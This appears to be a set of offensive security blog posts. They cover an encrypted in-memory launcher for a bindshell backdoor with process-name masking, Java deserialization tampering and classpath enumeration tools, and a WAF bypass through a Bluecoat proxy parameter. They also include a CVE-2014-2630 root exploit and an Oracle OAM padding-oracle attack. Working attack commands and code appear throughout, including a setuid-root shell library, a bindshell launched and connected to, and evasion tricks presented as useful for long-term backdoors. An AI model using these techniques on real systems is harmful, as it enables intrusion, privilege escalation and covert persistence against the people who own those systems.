What we can do to get around the issue is to encrypt the “.rodata” section as well, and decrypt it on-the-fly in memory when needed, as we have already done with the binary instructions in the “.text” section. The new version of the launcher component (golden_frieza_launcher_v2) can be downloaded here and compiled with “gcc golden_frieza_launcher_v2.c -o golden_frieza_launcher_v2 -ldl”. Let’s see how it works. First the “.text” section of our bindshell module is encrypted:

$ dd if=./testalo_bindshell_mod.so of=./text_section.txt skip=1738 bs=1 count=1055

$ openssl rc4 -e -K 41414141414141414141414141414141 -in text_section.txt -out text_section.enc -nopad

$ dd if=./text_section.enc of=./testalo_bindshell_mod.so seek=1738 bs=1 count=1055 conv=notrunc

Same thing for the “.rodata” section:

$ dd if=./testalo_bindshell_mod.so of=./rodata_section.txt skip=2805 bs=1 count=193

$ openssl rc4 -e -K 41414141414141414141414141414141 -in rodata_section.txt -out rodata_section.enc -nopad

$ dd if=./rodata_section.enc of=./testalo_bindshell_mod.so seek=2805 bs=1 count=193 conv=notrunc

Then the launcher is executed. It takes the bindshell module filename (now both with encrypted “.text” and “.rodata” sections) as a parameter:

$ ./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so

The “.text” section offset and length are passed as hex values (we have already seen how to get those):

Enter .text offset and len in hex (0xXX): 0x6ca 0x41f
Offset is 1738 bytes
Len is 1055 bytes

Next, the “.rodata” section offset and length are passed as hex values too. As seen in the last “readelf” screenshot above, in this case the section starts at 0xaf5 and the length is calculated as 0xbb5 - 0xaf5 + 1 = 0xc1:

Enter .rodata offset and len in hex (0xXX): 0xaf5 0xc1
.rodata offset is 2805 bytes
.rodata len is 193 bytes

Then the launcher asks for a command line parameter. Indeed, our bindshell module (specifically the exported “testalo()” function) takes as an input parameter the TCP port it has to listen on. We choose 9000 for this example:

Enter cmdline: 9000
Cmdline is: 9000

The encryption key (“AAAAAAAAAAAAAAAA”) is now inserted without being echoed back:

Enter key:

The final part of the output is:

PID is: 3915
Module name is: testalo_bindshell_mod.so
7f5d0942f000-7f5d09430000 r-xp 00000000 fd:01 7602214 /tmp/testalo_bindshell_mod.so
Start address is: 0x7f5d0942f000
End address is 0x7f5d09430000

Execution of .text
==================

This time we get nothing below the “Execution of .text” message. This is due to the behavior of our bindshell, which does not print anything to standard output. However, the bindshell backdoor has been launched properly in the background:

$ netstat -an | grep 9000
tcp 0 0 0.0.0.0:9000 0.0.0.0:* LISTEN

$ telnet localhost 9000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
python -c 'import pty; pty.spawn("/bin/sh")'
$ id
uid=1000(cippalippa) gid=1000(cippalippa_group)

Last old-school trick of the day

A fair question is: how does the process show up in the process list after the bindshell backdoor is executed?

$ ps -wuax
[...]
./golden_frieza_launcher_v2 ./testalo_bindshell_mod.so
[...]

Unfortunately, the system owner could identify the process as malicious at first glance! This is normally not an issue if our code runs for a short amount of time. But what if we want to plant a backdoor or C&C agent for a longer period? In that case it would be convenient to mask the process somehow. That is exactly what the piece of code below (implemented in complete form here) does.

Let’s first compile the new version of the launcher binary:

$ gcc golden_frieza_launcher_v3.c -o golden_frieza_launcher_v3 -ldl

This time the launcher takes an additional parameter beyond the encrypted dynamic library filename: the name we want to assign to the process. In the example below, “[initd]” is used:

$ ./golden_frieza_launcher_v3 ./testalo_bindshell_mod.so "[initd]"

Indeed by means of “netstat” we can spot the PID of the process (assuming the bindshell backdoor has started on TCP port 9876):

$ netstat -tupan | grep 9876
tcp 0 0 0.0.0.0:9876 0.0.0.0:* LISTEN 19087

…and from the PID the actual process name:

$ ps -wuax | grep init
user 19087 0.0 0.0 8648 112 pts/5 S 19:56 0:00 [initd]

Well, now you know you should never trust the ps output! 🙂

Conclusion

What if somebody discovers the launcher binary and the encrypted ELF dynamic library on the filesystem? The encryption key is not known, hence nobody can decrypt and execute our payload.

What if the offset and length of the encrypted sections are entered incorrectly? In most cases this will lead to a segfault or illegal instruction and the consequent crash of the launcher component. Again, the code does not leak out.

Can this be done on a Windows machine? Well, if you think about “LoadLibrary()”, “LoadModule()” and “GetProcAddress()”, these API functions do the same as “dlopen()” and “dlsym()”.

That’s all for today!

Snafuz, snafuz!

Interactive modification of Java Serialized Objects with SerialTweaker

Today we release another Java tool from the Serially toolkit. This tool can be used for advanced Java deserialization attacks, when existing gadget chains don’t work or when there is a whitelist mechanism in place (like LookAheadDeserialization). In that case we have to work with the classes that are in the whitelist and thus accepted by the application. Instead of sending a gadget chain containing classes unfamiliar to the application, the idea is to modify the existing serialized objects that the application uses during normal operations.

WARNING! This tool will deserialize input that it is given. It is therefore vulnerable to deserialization attacks by definition. Please make sure the input you use is not malicious, and/or use the tool in an isolated sandboxed environment.

Example usage

The probability of achieving RCE this way is pretty small; in this kind of attack something like an authorization bypass is much more likely. Let’s discuss an example of how to perform the Java serialized object modification. Imagine an object that contains information about a user. It may contain values like the ID, the username and a reference to an object that defines roles and permissions. If we spot this object in serialized form on the wire, we can feed it to SerialTweaker in the following way:

We feed the Base64-encoded version of the serialized object directly on the command line as the argument of ‘-b’. SerialTweaker will decode it to a raw serialized object and analyze it via a customized implementation of ObjectInputStream. This customized version captures all classes present inside the serialized object, so we can create a list of the classes needed to perform deserialization. Note that in order to deserialize the object locally, the Java runtime must have the required classes on the classpath. Therefore we use the same technique as with EnumJavaLibs: we keep a local repository of jar files and dynamically load what is needed.

So once the analysis is finished, SerialTweaker preloads the required libraries. The next step is to attempt deserialization. If it encounters a class that is present in multiple jar files, it will prompt the user to choose which library to load it from. In our case, the classes are directly traceable to the jar file “UserDb.jar”, so no prompt is shown. The big integers following the class names are the SerialVersionUIDs of the classes.

Modifying variables

When deserialized, the contents of the class variables are printed. These are values which are normally encoded within the serialized object, and thus values that we can modify. Keep in mind that static and transient variables are not serialized by default. SerialTweaker will still print them and allow you to modify them, because the class may implement a writeObject() method that does serialize them. But in the default case, modifying these values will not work because they are not serialized. A warning “(not serialized by default)” is printed after the variable output to remind the user of this behavior.

In our example, the 3rd field of the User class is a reference to a Roles object. SerialTweaker recognizes references and will print nested classes. The Roles class contains a boolean variable, which we would like to change to true.

Next, the user is asked whether to perform any modifications. We type the id of the field we want to change (3) and the new value for it (T, for true). SerialTweaker prints the modified version of the object to confirm the modification was successful. Once we’re done making changes, the modified object is serialized and the Base64 output is printed to the user.

Modifying ViewState

An interesting subject for serialized object modification is the JSF viewstate. When configured to store state client-side, JSF websites ship a serialized object back and forth with every request. It is usually a large object containing information about the state of UI elements. Changing these values might give an attacker an opportunity to bypass certain restrictions.

SerialTweaker has a special ‘viewstate mode’, which will grab and decrypt (with ‘-k’) the viewstate from a given URL. Use the ‘-v’ flag to supply the URL.

Evaluation

There are already existing tools out there that can modify serialized objects. The difference is that they work by modifying the serialized object directly, at a much lower level. This method is error-prone, because the serialized object contains various length fields and references which need to be updated accordingly. SerialTweaker can make much more advanced modifications, but this comes at a price: you need to have the classes on your classpath in order to deserialize them. Modifying values inside custom classes is therefore not possible with this approach.

The local repository of jar files is expected in ~/.serially/jars and should be indexed by using JavaClassDB.py from the EnumJavaLibs project.

Download

The tool is released on our GitHub page.

How to hack a company by circumventing its WAF through the abuse of a different security appliance and win bug bounties

Hey, wait! What do bug bounties and network security appliances have in common? Usually nothing! On the contrary, security appliances enable virtual patching practices and actively contribute to reducing the number of bug bounties paid to researchers… but this is a reverse story: a bug bounty was paid to us thanks to a misconfigured security appliance. We are not going to reveal either the name of the affected company (except that it was a Fortune 500) or that of the vulnerable component. However, we will talk about the technique used, because it is astonishingly simple.

The observation

It all began by browsing what at the time we did not even know to be a valuable target; let us call it “https://targetdomain“. Almost by accident, we noticed that a subdomain responsible for authentication on that website exposed some CSS and Javascript resources attributable to a Java component well known to be vulnerable to RCE (Remote Code Execution).

The weird thing was that by browsing the affected endpoint (something like “https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload“) we received an HTTP 404 reply from the server, which made us suspect the presence of a Web Application Firewall. Why should that particular endpoint not be reachable when the resources decorating it (.css and .js files) are? This clearly made us believe we were in front of a WAF. After a few more requests, all blocked, we confirmed that some kind of WAF rule was indeed preventing us from reaching the target endpoint.

The “weird” thing

By browsing one of the hosted applications (i.e. https://targetdomain/appname) we are invited to authenticate to “https://auth.targetdomain“. During the authentication process, we notice another strange thing. At a certain moment we are redirected to a URL like:

https://targetdomain/?cfru=aHR0cHM6Ly90YXJnZXRkb21haW4vYXBwbmFtZQ==

with “aHR0cHM6Ly90YXJnZXRkb21haW4vYXBwbmFtZQ==” being clearly a base64-encoded string. The base64 payload, after decoding, turned out to be nothing more than the URL we had originally requested access to before starting the authentication, that is “https://targetdomain/appname“.

But what actually was that “cfru” parameter? Some quick research online showed it is part of the Bluecoat web filtering technology, a well-known proxy server appliance. So this told us a bit more about the remote infrastructure: the HTTP requests we send to the target cross at least one WAF device and a Bluecoat proxy server before reaching the front-end web servers and application servers, as reconstructed below.

The idea

A light bulb lit up over our heads once we discovered that this “cfru” parameter was publicly accessible, namely that no authentication to the portal was required to pass our payload to it. Therefore we started to base64-encode URLs of external domains under our control and feed these strings to the “cfru” parameter. The hope was to trigger some kind of SSRF. What we got in the end was much better.

Unfortunately, at that specific moment, we did not receive any HTTP requests back. However, on our internet-exposed machines, we could see the DNS resolution process initiated from “targetdomain”. It seemed outgoing TCP connections from the target website were prohibited. The only thing allowed was, as said, DNS traffic. So instead of trying to trigger SSRF requests to external hosts, we turned our attention to internal subdomains (https://auth.targetdomain, https://blog.targetdomain, https://www.targetdomain, etc…).

We start to base64-encode a few of these URLs into the “cfru” parameter and almost immediately notice another weirdness. For some URLs we get an HTTP 302 redirect back; for others we do not. In the latter case, the HTTP body of the reply contains the HTML code of the requested resource, as if Bluecoat forwarded the request to the destination resource and returned its content back to us, acting as a web proxy. Most importantly, this behavior was also observed when we encoded in the “cfru” parameter the subdomain responsible for authentication to the portal (https://auth.targetdomain), namely the one we believed was hosting a Java component vulnerable to RCE.

The turning point

This was the turning point! We made the following assumption. If the resource

https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload

is browsed directly, our HTTP request lands immediately on the WAF, where a configured rule recognizes the malicious attempt (the malicious payload pointed to by “param“) and sends back an HTTP 404 error, effectively blocking the attack.

But what if we encode in base64 the URL

https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload

which produces the following base64 string

aHR0cHM6Ly9hdXRoLnRhcmdldGRvbWFpbi92dWxuZXJhYmxlX2VuZHBvaW50P3BhcmFtPW1hbGljaW91c19SQ0VfcGF5bG9hZA==

and pass it to the “cfru” parameter as follows?

https://targetdomain/?cfru=aHR0cHM6Ly9hdXRoLnRhcmdldGRvbWFpbi92dWxuZXJhYmxlX2VuZHBvaW50P3BhcmFtPW1hbGljaW91c19SQ0VfcGF5bG9hZA==

In our case:

  1. The request crossed the WAF, which had nothing to complain about.
  2. It then arrived at the Bluecoat device, which base64-decoded the “cfru” parameter and issued a GET request toward the internal host https://auth.targetdomain/vulnerable_endpoint?param=malicious_RCE_payload.
  3. This in turn triggered the vulnerability.

Bingo!

And bingo! We can see the output of our malicious payload (nothing more than the “hostname” command) exfiltrated via DNS (outgoing TCP connections to our host on the internet were blocked, as already said).

Furthermore, we played a bit with our malicious payload in order to have the output of our injected commands returned directly as part of the HTTP headers in the server reply.

Conclusion

There are at least two mistakes that can be spotted here:

  • The Bluecoat device was behaving as a request “forwarder” instead of responding with an HTTP redirect, as happened for other URLs (which would have caused the subsequent client requests to be caught and blocked by the WAF).
  • There was no rule at the WAF level that base64-decoded the “cfru” parameter before passing it to the Bluecoat device, in order to analyze whether or not the request’s content matched one of the blocking rules deployed in the WAF itself.

Good for us! We notified the vendor of the vulnerability straight away and they decided to award us a nice bug bounty!

The bottom line here is that virtual patching is fine if you need a bit of extra time before fixing a serious vulnerability. But if you use it in place of real patching, well, it is only a question of time before you get hacked.

If you want to know more about similar exploitation techniques and other web hacking tricks, check out our Blackhat Las Vegas courses on August 1-2 and August 3-4, 2020, because this will be one of the topics covered there.

Remote Java classpath enumeration with EnumJavaLibs

Discovering a deserialization vulnerability is often pretty straightforward. When source code is available, it comes down to finding calls to readObject() and finding a way for user input to reach that function. In case we don’t have source code available, we can spot serialized objects on the wire by looking for binary blobs or base64-encoded objects (recognizable by ‘rO0..’). The hard part is exploitation. Sure, you can throw all the exploits from ysoserial at it and hope for the best, but if that doesn’t work there is not much else to try.

The big piece of information which is missing at this point, is information about the classpath of the remote application. If we know what libraries are loaded, we might be able to construct a gadget chain (or adjust the existing ysoserial exploit to match the version of the library on the remote application, for example). That’s where the idea of EnumJavaLibs comes from: just let it deserialize arbitrary objects from different (popular) 3rd party Java libraries. More specifically:

  1. Create a local database of the most common Java libraries
  2. For each of these libraries, find a class that is serializable
  3. Create an instance of this object, serialize it, and send it to the remote application
  4. If we get a ClassNotFoundException back, we know the library is not on the classpath

We have released the code of this project on GitHub, together with a tool that can build a database of libraries (JavaClassDB.py). You can download the pre-compiled version over here.

JMX/RMI

JMX/RMI is a perfect example where Java classpath enumeration can be done, as it meets the above conditions. When the endpoint is running a vulnerable Java version (that is, before the JEP 290 implementation), JMX/RMI endpoints are vulnerable by default (regardless of whether authentication is required). This is because a JMX/RMI endpoint exposes the RMIServerImpl_Stub.newClient(Object o) function, which deserializes any object provided (RMI functions that accept parameters of type Object should always be a red flag).

EnumJavaLibs has a specific ‘RMI’ mode which allows you to specify IP and port of the RMI service. It will then invoke the newClient() function for each serialized object from the jars in the database. Upon deserialization error, we get the full stacktrace back via RMI, so we can easily read whether the class was found or not – and conclude if the library is loaded in the classpath.

Web applications

Because the way to probe web applications is highly case-specific, EnumJavaLibs will not perform the HTTP requests for you. Instead, it will create a CSV file with (classname, base64_encoded_serialized_object) pairs, which you can then use to build the requests yourself. One way to do this would be to use Burp Intruder.

Internals

The tool uses a few Java ‘tricks’ which I would like to detail a bit more. The first one is dynamic loading of libraries. This has been made a lot harder (but not impossible) since Java 11, which is why the tool should be compiled with Java 8. Using URLClassLoader.addURL(), it is possible to load a jar file specified by its path. Because this method is not exposed by the JDK, reflection is required to make it accessible.

Once we load the jar, we go through all its classes one-by-one, and try to serialize them. It doesn’t matter to us which class, all we want is some class from the jar file. If the remote server is able to deserialize this class, there’s a high probability the library it comes from is loaded. But how do we serialize an arbitrary class from a jar file? Normally serialization happens as follows:

  1. Instantiate an object of the class with ‘new …’
  2. Serialize the object using ObjectOutputStream

To instantiate the object, we need information about its constructors though. We could get that via reflection, but what if it has a constructor that takes as argument another object? Or what if some conditions need to be met for these arguments, or otherwise the constructor will throw an exception? This results in a complex situation, which is hard to handle automatically. Fortunately, there is a way to instantiate objects without invoking constructors. And it’s not pretty. But it works.

It’s called the Unsafe class and it lets you do things that Java would normally forbid (for good reasons). One of them is instantiating classes without invoking the constructor. This works for our purposes, because at the remote side the ClassNotFoundException is thrown based on the name of the class; we don’t actually care about it being initialized properly. So after instantiation via Unsafe, we can serialize the object and, depending on how you run the tool, send it off over RMI or store the Base64-encoded version in the output file.

False positives

It might happen that the class which is deserialized at the remote server can actually be traced back to multiple libraries. Recall that we distinguish classes based on the combination of the fully qualified class name and the SerialVersionUID. So when the serializable class doesn’t specify a custom SerialVersionUID in the source code, it is not unthinkable that a collision occurs (meaning the fully qualified name is the same). But even in this case we can still be pretty sure about which library is used, just not the exact version. Take for example “org.apache.commons.fileupload.DiskFileUpload”: we can be pretty sure it comes from the commons-fileupload library, even though we might be unable to identify the exact version because the SerialVersionUID is the same between different versions.

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Privilege Escalation via HP xglance using perf-exploiter

In one of our recent penetration tests we abused a vulnerability affecting a suid binary called “xglance-bin“. Part of the HP Performance Monitoring solution, it allowed us to escalate our local unprivileged sessions on some Linux RHEL 7.x/8.x systems to root. To be honest, it was not the first time we leveraged that specific vulnerability: we have abused it frequently on many HP servers running RHEL since 2014.

There is indeed a CVE registered for the flaw (CVE-2014-2630), originally discovered by Tim Brown of Portcullis. However, its description was a bit cryptic (aka completely useless) -> “Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors“. Unspecified vulnerability? Unknown vector? Well… up to today, there is no trace on the internet of a public exploit. Hence the idea to release our code.

Short description

Linux applications use shared libraries (.so extension), which are a bit like DLLs in Windows applications. An ELF binary needs to know where these .so libraries are stored, so it can load them at execution time.

There are several methods for specifying the location of dynamic libraries:

  1. Using the “-rpath” or “--rpath-link” linker options when compiling the application.
  2. Using the environment variable LD_RUN_PATH.
  3. Using the environment variable LD_LIBRARY_PATH.
  4. Using the value of DT_RUNPATH or DT_RPATH, set with the “-rpath” option.
  5. Putting libraries into default /lib and /usr/lib directories.
  6. Specifying a directory containing libraries in /etc/ld.so.conf.

The objective of an attacker would be to control one of the methods above in order to replace an existing dynamic library with a malicious one. This is the context of the vulnerability we exploited. Specifically, we took advantage of case 1.

$ objdump -x xglance-bin | grep RPATH
RPATH -L/lib64:/usr/lib64:/usr/X11R6/lib64:/opt/perf/lib64

Indeed, as the “objdump” output clearly shows, the RPATH method was used to specify the location of the binary’s dynamic libraries. Unfortunately, one of those entries, “-L/lib64”, is a relative path. We can simply create the directory “-L/lib64”, put inside it a malicious library named like one of those xglance-bin loads…

$ ldd /opt/perf/bin/xglance-bin
[...]
libnums.so => -L/lib64/libnums.so (0x00007f0fb2b92000)
libXm.so.3 => -L/lib64/libXm.so.3 (0x00007f0fb2990000)
[...]

…and then launch the binary “/opt/perf/bin/xglance-bin” to escalate to root. The code can be downloaded from GitHub and is quite self-explanatory. Just make the bash script executable and run it: it will perform all the exploitation steps for you. It requires a compiler on the target machine; alternatively, the library can be compiled on a compatible local system and then copied manually to the remote one.
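The steps above can be sketched in a few lines of Python (a simplified illustration, not the actual GitHub exploit; the constructor payload and the compile flags are our own assumptions):

```python
import os
import shutil
import subprocess
import textwrap

# Hypothetical payload: a library constructor runs as soon as the dynamic
# loader maps the library, i.e. before main() of the suid binary.
C_SOURCE = textwrap.dedent("""\
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor))
    static void init(void) {
        setuid(0);
        setgid(0);
        system("/bin/sh");
    }
""")

def stage_fake_library(workdir):
    """Recreate the relative '-L/lib64' directory and plant libnums.so there."""
    libdir = os.path.join(workdir, "-L", "lib64")
    os.makedirs(libdir, exist_ok=True)
    src = os.path.join(libdir, "libnums.c")
    with open(src, "w") as f:
        f.write(C_SOURCE)
    if shutil.which("gcc"):   # the target needs a compiler, as noted above
        subprocess.run(["gcc", "-shared", "-fPIC", "-o",
                        os.path.join(libdir, "libnums.so"), src], check=True)
    return libdir

# From workdir, launching /opt/perf/bin/xglance-bin would then resolve
# libnums.so from the planted directory and spawn a root shell.
```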

A word should probably be spent on the symbols declared in the code itself, which make it quite big. This was due to some libraries that “xglance-bin” was trying to load but that were missing on the system we exploited. Instead of copying the absent libraries, we simply declared all the missing symbols in our code (nm, grep and cut are always your friends). Your environment could be different and not require this.

OAMBuster – Multithreaded exploit for CVE-2018-2879

Oracle OAM is a widely used component that handles authentication for many web applications. Any request to a protected resource on the web application redirects to OAM, which acts as middleware to perform user authentication.

Last year, a vulnerability was discovered in the login process: it contains a serious cryptographic flaw that can be exploited to:

  • Steal a session token
  • Create a session token for any user

Basically, it allows an attacker to log in to the website and impersonate any user. Bad stuff.

Technical Details

During login, Oracle OAM sends a value called encquery as part of the URL. This parameter contains values such as a salt and a timestamp, and is encrypted with AES-CBC. However:

  • There is no HMAC attached to verify that the encrypted string wasn’t tampered with
  • The website responds with an error message when there is a padding error during decryption

This makes it vulnerable to a classic Padding Oracle Attack.

However, there is one extra challenge: we cannot simply append blocks of data to the end of the string, because the decrypted value contains a validation hash at the end. When we append a block (which turns into gibberish when decrypted), the hash is no longer valid and the oracle becomes useless – it will simply always return an error.

The fix to this problem is simple: we first search for a ciphertext byte that decrypts to a space (0x20). The hash then remains untouched, and the gibberish we place after it is interpreted as a new value.
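To make the byte-guessing mechanics concrete, here is a self-contained sketch of a classic padding oracle attack. The OAM endpoint is obviously not reproduced here: the oracle is simulated locally with a toy invertible “block cipher” (multiplication by an odd constant mod 2^128 – not real crypto, just something the sketch can decrypt), but the attack loop itself is the standard one:

```python
BLOCK = 16
MOD = 1 << 128
KEY = 0x2B7E151628AED2A6ABF7158809CF4F3D | 1   # toy key, forced odd so it is invertible
KEY_INV = pow(KEY, -1, MOD)

def _enc_block(b):   # toy "block cipher": invertible multiply mod 2**128
    return (int.from_bytes(b, "big") * KEY % MOD).to_bytes(BLOCK, "big")

def _dec_block(b):
    return (int.from_bytes(b, "big") * KEY_INV % MOD).to_bytes(BLOCK, "big")

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(msg, iv):
    padlen = BLOCK - len(msg) % BLOCK
    msg += bytes([padlen]) * padlen                 # PKCS#7 padding
    out, prev = b"", iv
    for i in range(0, len(msg), BLOCK):
        prev = _enc_block(_xor(msg[i:i + BLOCK], prev))
        out += prev
    return out

def padding_oracle(iv, ct):
    """The server-side leak: does the ciphertext decrypt to valid padding?"""
    pt, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        pt += _xor(_dec_block(ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    n = pt[-1]
    return 1 <= n <= BLOCK and pt.endswith(bytes([n]) * n)

def attack_block(prev, block):
    """Recover one plaintext block, last byte first, via the oracle only."""
    inter = bytearray(BLOCK)                 # intermediate state D(block)
    for padlen in range(1, BLOCK + 1):
        pos = BLOCK - padlen
        for guess in range(256):
            fake = bytearray(BLOCK)
            fake[pos] = guess
            for j in range(pos + 1, BLOCK):
                fake[j] = inter[j] ^ padlen  # force a valid padding tail
            if not padding_oracle(bytes(fake), block):
                continue
            if padlen == 1:                  # rule out an accidental 0x02 0x02...
                fake[pos - 1] ^= 0xFF
                if not padding_oracle(bytes(fake), block):
                    continue
            inter[pos] = guess ^ padlen
            break
    return _xor(inter, prev)
```

Each byte costs up to 256 oracle queries, which is why the real attack against encquery takes hours over the network.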

For more in-depth information, please read these excellent blog posts by SEC Consult:

Exploit

There have been exploits in the wild for some time, but they are single-threaded. Because the attack requires guessing byte values one by one, it can take about 4 hours to complete (without rate limiting).

At RedTimmy we have developed a multithreaded version of the exploit called OAMBuster. The source code is available on GitHub.

OAMBuster is able to perform the following actions:

  • Verify if the target is vulnerable to the attack (<30 seconds)
  • Decrypt the encquery string, using POA
  • Decrypt any given string, using POA
  • Encrypt any given string, using POA

The final two functions can be used, for example, to decrypt the OAMAuthnCookie containing the session token and then re-encrypt it.

Benefits of the multithreaded implementation

Because OAMBuster runs multiple threads, it can decrypt multiple blocks at the same time. For example, when there are 16 blocks in total, the tool runs 16 threads, one on the last byte of each block. When a thread finishes, it moves on to the second-to-last byte of its block, and so forth, working from back to front. Bytes within a block cannot be parallelized, as each depends on the previous one.
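The scheduling idea can be sketched independently of the crypto: each block is an independent task handed to a thread pool, while the bytes inside a block are recovered sequentially (the hypothetical recover_byte callback stands in for the actual oracle queries):

```python
from concurrent.futures import ThreadPoolExecutor

BLOCK = 16

def recover_block(index, recover_byte):
    """Bytes within a block depend on each other, so they run sequentially."""
    out = bytearray(BLOCK)
    for pos in reversed(range(BLOCK)):       # back to front, as in the attack
        out[pos] = recover_byte(index, pos)
    return bytes(out)

def recover_all(n_blocks, recover_byte, workers=None):
    """Each block is independent, so blocks are attacked in parallel."""
    with ThreadPoolExecutor(max_workers=workers or n_blocks) as pool:
        futures = [pool.submit(recover_block, i, recover_byte)
                   for i in range(n_blocks)]
        return [f.result() for f in futures]
```

With 16 blocks and 16 workers the wall-clock time collapses to roughly that of the slowest single block.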

Needless to say, you can subscribe to our Blackhat course if you want to play with it more:

Links

https://github.com/redtimmy/OAMBuster